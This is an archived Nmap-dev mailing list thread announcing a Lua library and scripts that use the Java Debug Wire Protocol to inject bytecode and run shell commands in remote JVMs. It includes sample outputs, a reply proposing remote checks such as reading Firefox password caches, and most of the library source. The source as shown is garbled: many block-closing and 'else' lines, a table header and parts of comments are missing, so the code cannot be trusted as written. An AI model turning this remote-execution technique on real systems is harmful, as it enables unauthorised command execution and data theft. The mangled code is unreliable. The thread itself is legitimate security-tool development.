Nmap Development mailing list archives

Re: [NSE] Announcing jdwp library and scripts

From: Ron <ron () skullsecurity net>
Date: Mon, 13 Aug 2012 09:00:57 -0500

Not a comment directly about your scripts, but a general thought..

It'd be nice if there was some generic interface for "scripts that can
read files on the host machine", whether it be through jdwp, ssh, smb, ftp,
etc. Then you could have scripts run later that would "read the firefox
password cache and print them out", or "check for outdated versions of
netapi.dll" for example. Basically, do local checks. 

It'd be neat to make it easy to write local checks that could run
through any number of read-a-remote-file interfaces! 


On 2012-08-12 20:33, Aleksandar Nikolic wrote:
Hi all,

lately I've been working on Java Debug Wire Protocol
library in order to exploit it for few scripts from
Script Ideas page.

The library its self implement enough functionality to achieve
custom java bytecode injection and execution which following
three scripts leverage:

jdwp-info script inject JDWPSystemInfo class which gathers information
from the remote system. Example output:
-- 2010/tcp open  search  syn-ack
-- | jdwp-info:
-- |   Available processors: 1
-- |   Free memory: 15331736
-- |   File system root: A:\
-- |   Total space (bytes): 0
-- |   Free space (bytes): 0
-- |   File system root: C:\
-- |   Total space (bytes): 42935926784
-- |   Free space (bytes): 29779054592
-- |   File system root: D:\
-- |   Total space (bytes): 0
-- |   Free space (bytes): 0
-- |   Name of the OS: Windows XP
-- |   OS Version : 5.1
-- |   OS patch level : Service Pack 3
-- |   OS Architecture: x86
-- |   Java version: 1.7.0_01
-- |   Username: user
-- |   User home: C:\Documents and Settings\user
-- |_  System time: Sat Aug 11 15:21:44 CEST 2012

jdwp-exec script injects JDWPExecCmd java class which executes custom
shell command
specified as "cmd" script argument and returns its output:
-- 2010/tcp open  search  syn-ack
-- | jdwp-exec:
-- |   date output:
-- |   Sat Aug 11 15:27:21 Central European Daylight Time 2012
-- |_

And finaly, jdwp-inject which allows specifying custom java .class file
to inject into
a remote JVM. Upon injection the script calls injected class' run()
method and
gets its output. Sample of injecting simple "Hello world" class:
-- 2010/tcp open  search  syn-ack
-- | jdwp-inject:
-- |_  Hello world from the remote machine!

Source and compiled classes are in nselib/data/jdwp-class/ directory.
It also contains a small readme file explaining how to compile them and
how to write your own classes to inject. Find the jdwp-class directory
as a jdwp-class zip file.

Many thanks to Michael Schierl, who is the author of jdwp-version script,
for his work on javapayload
from which I got the ideas on how to inject class files.

As always, I welcome comments, suggestions and ideas for improvements to


--- JDWP library implementing a set of commands needed to 
--  use remote debugging port and inject java bytecode. 
-- There are two basic packet types in JDWP protool. 
-- Command packet and reply packet. Command packets are sent by 
-- a debugger to a remote port which replies with a reply packet.
-- Simple handshake is needed to start the communication. 
-- The debugger sends a "JDWP-Handshake" string and gets the same as a reply.
-- Each (command and reply packet) has an id field since communication can be asynchronous.
-- Packet id can be monothonicaly increasing.
-- Although communication can be asynchronous, it is not (at least in my tests) so the same
-- packet id can be used for all communication. 
-- To start the connection, script should call <code>jdwp.connect()</code> which returns success
-- status and a socket. All other protocol functions require a socket as their first parameter.
-- Example of initiating connection:
-- <code>
-- local status,socket = jdwp.connect(host,port)
-- if not status then
--    stdnse.print_debug("error, %s",socket)
-- end
-- local version_info
-- status, version_info = jdwp.getVersion(socket,0)
-- </code>
-- References:
-- * http://docs.oracle.com/javase/6/docs/technotes/guides/jpda/jdwp-spec.html
--@copyright Same as Nmap--See http://nmap.org/book/man-legal.html
--@author Aleksandar Nikolic <patrik () cqure net>
-- Version 0.1
-- Created 08/10/2012 - v0.1 - Created by Aleksandar Nikolic

local stdnse = require "stdnse"
local string = require "string"
local bin = require "bin"
local table = require "table"

_ENV = stdnse.module("jdwp", stdnse.seeall)

-- JDWP protocol specific constants 
      handshake = "JDWP-Handshake" -- Connection initialization handshake

-- List of error codes from:
-- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_Error
      [0] = "NONE No error has occurred.",
      [10] = "INVALID_THREAD Passed thread is null, is not a valid thread or has exited.",
      [11] = "INVALID_THREAD_GROUP Thread group invalid.",
      [12] = "INVALID_PRIORITY Invalid priority.",
      [13] = "THREAD_NOT_SUSPENDED If the specified thread has not been suspended by an event.",
      [14] = "THREAD_SUSPENDED Thread already suspended.",
      [20] = "INVALID_OBJECT If this reference type has been unloaded and garbage collected.",
      [21] = "INVALID_CLASS Invalid class.",
      [22] = "CLASS_NOT_PREPARED Class has been loaded but not yet prepared.",
      [23] = "INVALID_METHODID Invalid method.",
      [24] = "INVALID_LOCATION Invalid location.",
      [25] = "INVALID_FIELDID Invalid field.",
      [30] = "INVALID_FRAMEID Invalid jframeID.",
      [31] = "NO_MORE_FRAMES There are no more Java or JNI frames on the call stack.",
      [32] = "OPAQUE_FRAME Information about the frame is not available.",
      [33] = "NOT_CURRENT_FRAME Operation can only be performed on current frame.",
      [34] = "TYPE_MISMATCH The variable is not an appropriate type for the function used.",
      [35] = "INVALID_SLOT Invalid slot.",
      [40] = "DUPLICATE Item already set.",
      [41] = "NOT_FOUND Desired element not found.",
      [50] = "INVALID_MONITOR Invalid monitor.",
      [51] = "NOT_MONITOR_OWNER This thread doesn't own the monitor.",
      [52] = "INTERRUPT The call has been interrupted before completion.",
      [60] = "INVALID_CLASS_FORMAT The virtual machine attempted to read a class file and determined that the file is 
malformed or otherwise cannot be interpreted as a class file.",
      [61] = "CIRCULAR_CLASS_DEFINITION A circularity has been detected while initializing a class.",
      [62] = "FAILS_VERIFICATION The verifier detected that a class file, though well formed, contained some sort of 
internal inconsistency or security problem.",
      [63] = "ADD_METHOD_NOT_IMPLEMENTED Adding methods has not been implemented.",
      [64] = "SCHEMA_CHANGE_NOT_IMPLEMENTED Schema change has not been implemented.",
      [65] = "INVALID_TYPESTATE The state of the thread has been modified, and is now inconsistent.",
      [66] = "HIERARCHY_CHANGE_NOT_IMPLEMENTED A direct superclass is different for the new class version, or the set 
of directly implemented interfaces is different and canUnrestrictedlyRedefineClasses is false.",
      [67] = "DELETE_METHOD_NOT_IMPLEMENTED The new class version does not declare a method declared in the old class 
version and canUnrestrictedlyRedefineClasses is false.",
      [68] = "UNSUPPORTED_VERSION A class file has a version number not supported by this VM.",
      [69] = "NAMES_DONT_MATCH The class name defined in the new class file is different from the name in the old 
class object.",
      [70] = "CLASS_MODIFIERS_CHANGE_NOT_IMPLEMENTED The new class version has different modifiers and and 
canUnrestrictedlyRedefineClasses is false.",
      [71] = "METHOD_MODIFIERS_CHANGE_NOT_IMPLEMENTED A method in the new class version has different modifiers than 
its counterpart in the old class version and and canUnrestrictedlyRedefineClasses is false.",
      [99] = "NOT_IMPLEMENTED The functionality is not implemented in this virtual machine.",
      [100] = "NULL_POINTER Invalid pointer.",
      [101] = "ABSENT_INFORMATION Desired information is not available.",
      [102] = "INVALID_EVENT_TYPE The specified event type id is not recognized.",
      [103] = "ILLEGAL_ARGUMENT Illegal argument.",
      [110] = "OUT_OF_MEMORY The function needed to allocate memory and no more memory was available for allocation.",
      [111] = "ACCESS_DENIED Debugging has not been enabled in this virtual machine. JVMDI cannot be used.",
      [112] = "VM_DEAD The virtual machine is not running.",
      [113] = "INTERNAL An unexpected internal error has occurred.",
      [115] = "UNATTACHED_THREAD The thread being used to call this function is not attached to the virtual machine. 
Calls must be made from attached threads.",
      [500] = "INVALID_TAG object type id or class tag.",
      [502] = "ALREADY_INVOKING Previous invoke not complete.",
      [503] = "INVALID_INDEX Index is invalid.",
      [504] = "INVALID_LENGTH The length is invalid.",
      [506] = "INVALID_STRING The string is invalid.",
      [507] = "INVALID_CLASS_LOADER The class loader is invalid.",
      [508] = "INVALID_ARRAY The array is invalid.",
      [509] = "TRANSPORT_LOAD Unable to load the transport.",
      [510] = "TRANSPORT_INIT Unable to initialize the transport.",
      [511] = "NATIVE_METHOD",
      [512] = "INVALID_COUNT The count is invalid."   

-- JDWP protocol Command packet as described at
-- http://docs.oracle.com/javase/6/docs/technotes/guides/jpda/jdwp-spec.html
-- Each command packet has a Command Set number, Command Number and data required
-- for that command.
JDWPCommandPacket = {

      new = function(self,id,command_set,command, data)
              local o = {
                      id = id,
                      flags = 0, -- current specification has no flags defined for Command Packets
                      command_set = command_set,
                      command = command,
                      data = data
              setmetatable(o, self)
        self.__index = self           
              return o
      -- Packs command packet as a string od bytes, ready to be sent
      -- to the target debugee.
      pack = function(self)
              local packed_packet
              if self.data == nil then 
                      packed_packet = bin.pack(">I",11) -- lenght - minimal header is 11 bytes
                      packed_packet = bin.pack(">I",11 + #self.data) -- lenght with data
              packed_packet = packed_packet .. bin.pack(">I",self.id)
              packed_packet = packed_packet .. bin.pack(">C",0)       -- flag
              packed_packet = packed_packet .. bin.pack(">C",self.command_set)
              packed_packet = packed_packet .. bin.pack(">C",self.command)
              if self.data then
                      packed_packet = packed_packet .. self.data
              return packed_packet

-- JDWP protocol Reply packet as described at 
-- http://docs.oracle.com/javase/6/docs/technotes/guides/jpda/jdwp-spec.html
-- Reply packets are recognized by 0x80 in flag field.
JDWPReplyPacket = {

      new = function(self,length,id,error_code,data)
              local o = {
                      length = length,
                      id = id,
                      flags = 0x80, -- no other flag is currently specified in the specification
                      error_code = error_code, -- see ERROR_CODES table
                      data = data -- reply data, contents depend on the command
              setmetatable(o, self)
        self.__index = self           
              return o
      -- Parses the reply into JDWPReplyPacket table.
      parse_reply = function(self,reply_packet)
              local pos,length,id,flags,error_code,data
              pos, length = bin.unpack(">I",reply_packet)
              pos, id = bin.unpack(">I",reply_packet,pos)
              pos, flags = bin.unpack(">C",reply_packet,pos)
              pos, error_code = bin.unpack(">S",reply_packet,pos)
              data = string.sub(reply_packet,pos)     
              if flags == 0x80 then
                      return true, JDWPReplyPacket:new(length,id,error_code,data)
              stdnse.print_debug(2,"JDWP error parsing reply. Wrong reply packet flag. Raw data: ", 
              return false, "JDWP error parsing reply."

--- Negotiates the initial debugger-debugee handshake.
--@param host Host to connect to.
--@param port Port to connect to.
--@return (status,socket) If status is false, socket is error message, otherwise socket is 
-- a newly created socket with initial handshake finished.
function connect(host,port)
      local status, result,err
      local socket = nmap.new_socket("tcp")
      local status, err = socket:connect(host, port)
      if not status then
              stdnse.print_debug(2,"JDWP could not connect: %s",err)
              return status, err 
      status, err = socket:send(JDWP_CONSTANTS.handshake)
      if not status then
              stdnse.print_debug(2,"JDWP could not send handshake: %s",err)
              return status, err
      status, result = socket:receive()
      if not status then
              stdnse.print_debug(2,"JDWP could not receive handshake: %s",result)
              return status, result
      if result == JDWP_CONSTANTS.handshake then
              stdnse.print_debug("JDWP handshake successful.")
              return true, socket
      return false, "JDWP handshake unsuccessful."

--- Helper function to pack regular string into UTF-8 string.
--@param data String to pack into UTF-8.
--@return utf8_string UTF-8 packed string. Four bytes lenght followed by the string its self.
function toUTF8(data)
      local utf8_string = bin.pack(">i",#data) .. data
      return utf8_string

--- Helper function to read all Reply packed data which might be fragmented 
--  over multipe packets. 
--@param socket Socket to receive from.
--@return (status,data) If status is false, error string is returned, else data contains read ReplyPacket bytes.
function receive_all(socket)
      local status, result = socket:receive()
      if not status then
              return false,result
      local data = result
      local _, expected_length = bin.unpack(">I",result) -- first 4 bytes of packet data is the ReplyPacket length
      while expected_length > #data do -- read until we get all the ReplyPacket data
              status,result = socket:receive()
              if not status then
                      return true, data -- if somethign is wrong,return partial data 
              data = data .. result
      return true,data 

--- Helper function to extract ascii string from UTF-8
-- Writen in this way so it can be used interchangeably with bin.unpack().
--@param data Data from which to extract the string.
--@param pos  Offset into data string where to begin.
--@return (pos,ascii_string) Returns position where the string extraction ended and actuall ascii string.
local function extract_string(data,pos)
      local string_size
      if pos > #data then
              stdnse.print_debug(2,"JDWP extract_string() position higher than data length, probably incomplete data 
              return pos, nil
      pos, string_size = bin.unpack(">I",data,pos)
      local ascii_string = string.sub(data,pos,pos+string_size)
      local new_pos = pos+string_size
      return new_pos,ascii_string

--- Helper function that sends the Command packet and parses the reply.
--@param socket Socket to use to send the command.
--@param command <code>JDWPCommandPacket</code> to send. 
--@return (status,data) If status is false, data contains specified error code message. If true, data contains data 
from the reply.
function executeCommand(socket,command)
      local status, result = receive_all(socket)
      if not status then
              return false, "JDWP executeCommand() didn't get a reply."
      local reply_packet
      status, reply_packet = JDWPReplyPacket:parse_reply(result)      
      if not status then
              return false, reply_packet
      if not (reply_packet.error_code == 0) then -- we have a packet with error , error code 0 means no error occured
              return false, ERROR_CODES[reply_packet.error_code]
      local data = reply_packet.data
      return true, data

--- VirtualMachine Command Set (1) 
--  Commands targeted at the debugggee virtual machine.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_VirtualMachine

--- Version Command (1) 
--  Returns the JDWP version implemented by the target VM as a table.
--  Returns a table with following values:
--  * 'description' Debugge vm verbose description.
--  * 'jdwpMajor'   Number representing major JDWP version.
--  * 'jdwpMinor'   Number representing minor JDWP version.
--  * 'vmVersion'   String representing version of the debuggee VM.
--  * 'vmName'                Name of the debuggee VM.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_VirtualMachine_Version
--@param socket Socket to use to send the command.
--@param id    Packet id. 
--@return (status,version_info) If status is false, version_info is an error string, else it contains remote VM 
version info. 
function getVersion(socket,id)
      local command = JDWPCommandPacket:new(id,1,1,nil) -- Version Command (1)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getVersion() error : %s",data)
              return false,data
      -- parse data
      local version_info = {description = "",
                                                jdwpMajor = 0,
                                                jdwpMinor = 0,
                                                vmVersion = "",
                                                vmName = ""}
      local vmVersionSize
      local pos
      pos, version_info.description = extract_string(data,0)
      pos, version_info.jdwpMajor = bin.unpack(">i",data,pos)
      pos, version_info.jdwpMinor = bin.unpack(">i",data,pos)
      pos, version_info.vmVersion = extract_string(data,pos)
      pos, version_info.vmName = extract_string(data,pos)
      return true, version_info

--- Classes by Signature command (2)
--  Returns reference types for all the classes loaded by the target VM which match the given signature.
--  Given the class signature (like "Ljava/lang/Class") returns it's reference ID which can be used to reference that 
--  in other commands. Returns a list of tables containing following values:
--  * 'refTypeTag' JNI type tag
--  * 'referenceTypeID' Reference type of the class 
--  * 'status' Current class status.
--@param socket       Socket to use to send the command.
--@param id           Packet id. 
--@param signature Signature of the class. 
--@return (status,classes) If status is false, classes is an error string, else it contains list of found classes.
function getClassBySignature(socket,id,signature)
      local command = JDWPCommandPacket:new(id,1,2,toUTF8(signature))
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getClassBySignature() error : %s",data)
              return false,data
      -- parse data
      local classes = {}
      local pos,number_of_classes = bin.unpack(">i",data)

      for i = 1, number_of_classes do
              local class_info = { 
                      refTypeTag = nil,
                      referenceTypeID = nil,
                      status = nil
              pos, class_info.refTypeTag = bin.unpack("c",data,pos)
              pos, class_info.referenceTypeID = bin.unpack(">L",data,pos)
              pos, class_info.status = bin.unpack(">i",data,pos)
      return true, classes

--- AllThreads Command (4) 
--  Returns all threads currently running in the target VM .
-- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_VirtualMachine_AllThreads
--@param socket       Socket to use to send the command.
--@param id           Packet id. 
--@return (status, threads) If status is false threads contains an error string, else it conatins a list of all 
threads in the debuggee VM.
function getAllThreads(socket,id)
      local command = JDWPCommandPacket:new(id,1,4,nil)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getAllThreads() error: %s", data)
              return false,data
      -- parse data
      local pos,number_of_threads = bin.unpack(">i",data)
      local threads = {}
      for i = 1, number_of_threads do 
              local thread
              pos, thread = bin.unpack(">L",data,pos)
      return true, threads

--- Resume Command (9) 
--  Resumes execution of the application after the suspend command or an event has stopped it.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_VirtualMachine_Resume
--@param socket       Socket to use to send the command.
--@param id           Packet id. 
--@return (status, nil) If status is false error string is returned, else it's null since this command has no data in 
the reply.
function resumeVM(socket,id)
      local command = JDWPCommandPacket:new(id,1,9,nil)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP resumeVM() error: %s", data)
              return false,data
      -- wait for event notification
      status, data = receive_all(socket)      
      if not status then
              stdnse.print_debug(2,"JDWP resumeVM() event notification failed: %s", data)
      return true, nil

--- CreateString Command (11)
--  Creates new string object in the debuggee VM.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_VirtualMachine_CreateString
--@param socket                               Socket to use to send the command.
--@param id                                   Packet id. 
--@param ascii_string                 String to create.
--@return (status, stringID)  If status is false error string is returned, else stringID is newly created string.
function createString(socket,id,ascii_string)
      local command = JDWPCommandPacket:new(id,1,11,toUTF8(ascii_string))
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP createString() error: %s", data)
              return false,data
      local _,stringID = bin.unpack(">L",data)
      return true, stringID

--- AllClassesWithGeneric Command (20)
--  Returns reference types and signatures for all classes currently loaded by the target VM.
--  Returns a list of tables containing following info: 
--  * 'refTypeTag'       Kind of following reference type.   
--  * 'typeID'                   Loaded reference type  
--  * 'signature'        The JNI signature of the loaded reference type.  
--  * 'genericSignature'   The generic signature of the loaded reference type or an empty string if there is none.
--  * 'status'                   The current class status.   
--@param socket       Socket to use to send the command.
--@param id           Packet id. 
--@return (status, all_classes) If status is false all_classes contains an error string, else it is a list of loaded 
classes information.
function getAllClassesWithGeneric(socket,id)
      local command = JDWPCommandPacket:new(id,1,20,nil)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getAllClassesWithGeneric() error: %s", data)
              return false,data
      -- parse data
      local all_classes = {}
      local pos,number_of_classes = bin.unpack(">i",data)
      for i = 0 , number_of_classes do
              local class = {
                      refTypeTag = nil,
                      typeID = nil,
                      signature = nil,
                      genericSignature = nil,
                      status = nil
              if pos > #data then break end
              pos, class.refTypeTag = bin.unpack("C",data,pos)
              pos, class.typeID = bin.unpack(">L",data,pos)
              pos, class.signature = extract_string(data,pos)
              pos, class.genericSignature = extract_string(data,pos)
              pos, class.status = bin.unpack(">i",data,pos)
      return true, all_classes

--- ReferenceType Command Set (2) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ReferenceType

--- SignatureWithGeneric Command (13)
--  Returns the JNI signature of a reference type.
-- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ReferenceType_SignatureWithGeneric
--@param socket       Socket to use to send the command.
--@param id           Packet id. 
--@param classID   Reference type id of the class to get the signature from.
--@return (status, signature) If status is false signature contains an error string, else it is class signature (like 
function getSignatureWithGeneric(socket,id,classID)
      local command = JDWPCommandPacket:new(id,2,13,bin.pack(">L",classID)) -- Version Command (1)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getVersion() error : %s",data)
              return false,data
      local _,signature = extract_string(data,0)
      -- parse data
      return true,signature

--- MethodsWithGeneric Command (15)
--  Returns information, including the generic signature if any, for each method in a reference type.
--  Returns a list of tables containing following fields for each method:
--  * 'methodID'                      Method ID which can be used to call the method.
--  * 'name'                          The name of the method.  
--  * 'signature'                     The JNI signature of the method.  
--  * 'generic_signature'     The generic signature of the method, or an empty string if there is none.  
--  * 'modBits'                               The modifier bit flags (also known as access flags) which provide 
additional information on the method declaration.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ReferenceType_MethodsWithGeneric
--@param socket       Socket to use to send the command.
--@param id           Packet id. 
--@param classID   Reference type id of the class to get the list of methods.
--@return (status, signature) If status is false methods contains an error string, else it a list of methods 
function getMethodsWithGeneric(socket,id,classID)
      local command = JDWPCommandPacket:new(id,2,15,bin.pack(">L",classID))
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getMethodsWithGeneric() error : %s",data)
              return false,data
      -- parse data   
      local methods = {}
      local pos,number_of_methods = bin.unpack(">i",data)

      for i = 1, number_of_methods do
              local method_info = {
                      methodID = nil,
                      name = nil,
                      signature = nil,
                      generic_signature = nil,
                      modBits = nil
              pos, method_info.methodID = bin.unpack(">i",data,pos)
              pos,method_info.name = extract_string(data,pos)
              pos, method_info.signature = extract_string(data,pos)
              pos,method_info.generic_signature = extract_string(data,pos)
              pos, method_info.modBits = bin.unpack(">i",data,pos)
      return true, methods

--- ClassType Command Set (3)
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ClassType

--- InvokeMethod Command (3) 
--  Invokes a class' static method and returns the reply data.
--  Reply data can vary so parsing is left to the function caller.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ClassType_InvokeMethod
--@param socket               Socket to use to send the command.
--@param id                   Packet id. 
--@param classID      Reference type id of the class.
--@param methodID     ID of the static method to call.
--@numberOfArguments  Number of method arguments.
--@arguments                  Already packed arguments.
--@options                            Invocation options.
--@return (status, data) If status is false data contains an error string, else it contains a reply data and needs to 
be parsed manualy.
function invokeStaticMethod(socket,id,classID,methodID,numberOfArguments,arguments,options)
      local params
      if numberOfArguments == 0 then
              params = bin.pack(">Liii",classID,methodID,numberOfArguments,options)
              params = bin.pack(">Lii",classID,methodID,numberOfArguments) .. arguments .. bin.pack(">i",options)
      local command = JDWPCommandPacket:new(id,3,3,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP invokeStaticMethod() error: %s", data)
              return false,data
      return true,data

--- NewInstance Command (4)
--  Creates a new object of this type, invoking the specified constructor. 
--  The constructor method ID must be a member of the class type.
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ClassType_NewInstance
--@param socket               Socket to use to send the command.
--@param id                   Packet id. 
--@param classID      Reference type id of the class.
--@param threadID             The thread in which to invoke the constructor.  
--@param methodID     The constructor to invoke.  
--@numberOfArguments  Number of constructor arguments.
--@arguments                  Already packed arguments.
--@return (status, objectID) If status is false data contains an error string, else it contains a reference ID of the 
newly created object.
function newClassInstance(socket,id,classID,threadID,methodID,numberOfArguments,arguments)
      local params
      if numberOfArguments == 0 then
              params = bin.pack(">LLiii",classID,threadID,methodID,numberOfArguments,0)
              params = bin.pack(">LLii",classID,threadID,methodID,numberOfArguments) .. arguments
      local command = JDWPCommandPacket:new(id,3,4,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP newClassInstance() error: %s", data)
              return false,data
      -- parse data
      stdnse.print_debug("newClassInstance data: %s",stdnse.tohex(data))
      local pos, tag = bin.unpack(">C",data)
      pos, objectID = bin.unpack(">L",data,pos)
      return true,objectID

--- ArrayType Command Set (4) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ArrayType

--- NewInstance Command (1)
--    Creates a new array object of the specified type with a given length. 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ArrayType_NewInstance
--@param socket               Socket to use to send the command.
--@param id                   Packet id. 
--@param arrayType            The array type of the new instance as per JNI 
--@param length               Length of the new array.
--@return (status, arrayID) If status is false data contains an error string, else it contains a reference ID of the 
newly created array.
function newArrayInstance(socket,id,arrayType,length)
      local params = bin.pack(">Li",arrayType,length)
      local command = JDWPCommandPacket:new(id,4,1,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP newArrayInstance() error: %s", data)
              return false,data
      local pos,_ , tag, arrayID 
      pos, tag = bin.unpack("C",data)
      _, arrayID = bin.unpack(">L",data,pos)
      return true, arrayID

--- ObjectReference Command Set (9) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ObjectReference

--- ReferenceType Command (1)
--  Returns the runtime type of the object. The runtime type will be a class or an array. 
-- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ObjectReference_ReferenceType 
--@param socket               Socket to use to send the command.
--@param id                   Packet id. 
--@param objectID             The ID of an object. 
--@return (status, runtime_type) If status is false runtime_type contains an error string, else it contains runtime 
type of an object.
function getRuntimeType(socket,id,objectID)
      local command = JDWPCommandPacket:new(id,9,1,bin.pack(">L",objectID))
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP resumeVM() error: %s", data)
              return false,data
      local _,tag,runtime_type = bin.unpack(">CL",data)
      stdnse.print_debug("runtime type: %d",runtime_type)
      return true,runtime_type

--- InvokeMethod Command (6) 
--  Invokes a instance method with specified parameters. 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ObjectReference_InvokeMethod
--@param socket                       Socket to use to send the command.
--@param id                           Packet id. 
--@param objectID                     The ID of an object. 
--@param threadID                     The thread in which to invoke.   
--@param classID                      The class type.     
--@param methodID                     ID of the method to invoke.
--@param numberOfArguments    Number of method arguments. 
--@arguments                          Already packed arguments.
--@return (status, data) If status is false data contains an error string, else it contains a reply data and needs to 
be parsed manualy.
function invokeObjectMethod(socket,id,objectID,threadID,classID,methodID,numberOfArguments,arguments)
      local params
      if numberOfArguments == 0 then
              params = bin.pack(">LLLii",objectID,threadID,classID,methodID,numberOfArguments)
              params = bin.pack(">LLLii",objectID,threadID,classID,methodID,numberOfArguments) .. arguments
      local command = JDWPCommandPacket:new(id,9,6,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP invokeObjectMethod() error: %s", data)
              return false,data
      stdnse.print_debug("invoke obj method data: %s ",stdnse.tohex(data))
      return true,data

--- StringReference Command Set (10) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_StringReference

--- Value Command (1)
--  Returns the characters contained in the string. 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_StringReference_Value
--@param socket                       Socket to use to send the command.
--@param id                           Packet id. 
--@param stringID                     The ID of a string to read. 
--@return (status, data)      If status is false result contains an error string, else it contains read string.
function readString(socket,id,stringID)
      local command = JDWPCommandPacket:new(id,10,1,bin.pack(">L",stringID))
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP readString() error: %s", data)
              return false,data
      local _,result = extract_string(data,0)
      return true,result

--- ThreadReference Command Set (11) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ThreadReference

--- Name Command (1)
--  Returns the thread name. 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ThreadReference_Name
--@param socket                                       Socket to use to send the command.
--@param id                                           Packet id. 
--@param threadID                                     The ID of a thread.
--@return (status, thread_name)       If status is false thread_name contains an error string, else it contains 
thread's name.
function getThreadName(socket,id,threadID)
      local params = bin.pack(">L",threadID)
      local command = JDWPCommandPacket:new(id,11,1,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP getThreadName() error: %s", data)
              return false,data
      -- parse data
      local _,thread_name = extract_string(data,0)
      return true, thread_name        

--- Suspend Command (2)
--  Suspends the thread. 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ThreadReference_Suspend
--@param socket                                       Socket to use to send the command.
--@param id                                           Packet id. 
--@param threadID                                     The ID of a thread.
--@return (status, thread_name)       If status is false an error string is returned, else it's nil.
function suspendThread(socket,id,threadID)
      local params = bin.pack(">L",threadID)
      local command = JDWPCommandPacket:new(id,11,2,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP suspendThread() error: %s", data)
              return false,data
      return true, nil

--- Status Command (4)
--  Returns the current status of a thread.
--  Thread status is described with ThreadStatus and SuspendStatus constants 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ThreadReference_Status
--@param socket                                       Socket to use to send the command.
--@param id                                           Packet id. 
--@param threadID                                     The ID of a thread.
--@return (status, thread_name)       If status is false an error string is returned, else unparsed thread status 
function threadStatus(socket,id,threadID)
      local params = bin.pack(">L",threadID)
      local command = JDWPCommandPacket:new(id,11,4,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP threadStatus() error: %s", data)
              return false,data
      stdnse.print_debug("threadStatus %s",stdnse.tohex(data))
      return true, data

--- ArrayReference Command Set (13) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ArrayReference

--- SetValues Command (3)
--  Sets a range of array components.
-- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_ArrayReference_SetValues
--@param socket                                       Socket to use to send the command.
--@param id                                           Packet id. 
--@param objectID                                     The ID of an array object.
--@return (status, data)                      If status is false an error string is returned, else it's nil.
function setArrayValues(socket,id,objectID,idx,values)
      local params = bin.pack(">Lii",objectID,idx,#values) .. values
      local command = JDWPCommandPacket:new(id,13,3,params)
      local status, data = executeCommand(socket,command)
      if not status then
              stdnse.print_debug(2,"JDWP setArrayValues() error: %s", data)
              return false,data
      return true, nil        

--- EventRequest Command Set (15) 
--  http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_EventRequest

--- Uses Set Command (1) to set singlesteping to specified thread.
-- http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html#JDWP_EventRequest_Set
--@param socket                                       Socket to use to send the command.
--@param id                                           Packet id. 
